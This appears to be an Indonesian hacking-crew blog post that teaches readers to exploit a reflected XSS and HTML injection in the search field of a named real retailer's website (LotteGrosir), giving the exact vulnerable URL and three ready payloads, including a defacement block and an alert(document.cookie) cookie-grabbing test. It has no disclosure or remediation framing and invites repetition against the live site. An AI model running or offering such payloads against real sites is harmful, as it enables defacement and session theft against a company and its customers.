Reflected XSS On mirror.22xploitercrew.com

on
2

Reflected XSS LotteMart & LotteGrosir

on

Reflected XSS LotteMart & LotteGrosir

Hallo gaes balik lagi ama mimin ./CR0T_D1LU4R,

langsung aja sesuai judul Reflected XSS LotteMart & LotteGrosir


Saya menemukan Bug HTML Injection & XSS yah gaes pada Colum Search yaitu

https://www.lottegrosir.co.id/search?findby=semua&q=

lalu memasukan Payload HTML Injection nya gaes

<center><table height="400" width="400"> <td align="center"> <img class="getar" height="250" src="https://h.top4top.io/p_15688vjw10.jpg"/> <b><i><br><font size="5" color=red>XSS by ./CR0T_D1LU4R</font></br>

setelah memasukan payload nya nanti kalo bug nya masih vuln akan muncul seperti gambar dibawah ini...




bummmm berhasil yah gaes.


setelah HTML Injection sekarang kita coba Bug XSS nya gaes.

tapi sebelum itu jangan lupa untuk menonton...


Oke gaes mari kita Lanjut XSS pada LotteGrosir yah gaes

sama seperti tadi pada colum search yang ada di bawah ini..

https://www.lottegrosir.co.id/search?findby=semua&q=

lalu kalian masukan Payload yang di bawah ini

'"><img src=x onerror=prompt(1);>

yang nantinya akan muncul pop up seperti yang ada di gambar bawah ini...




Oke setelah itu langsung aja yah kan kita coba XSS Get Cookiee

https://www.lottegrosir.co.id/search?findby=semua&q=

kalian masukan Payloadnya seperti di bawah ini...

<img src=asdf onerror=alert(document.cookie)>

yang nanti akan muncul gambar seperti di bawah ini....
*Note: karna Lepi gua mati jadi pindah ke hp


Oke gaes mungkin segitu aja dari gua ./CR0T_D1LU4R

Jika kalian ingin melihat XSS pada website Lottemart nya silakan buka YouTube kami atau Klik link yang ada di bawah ini..

Klik Disini





#Author ./CR0T_D1LU4R

Comments

Post a Comment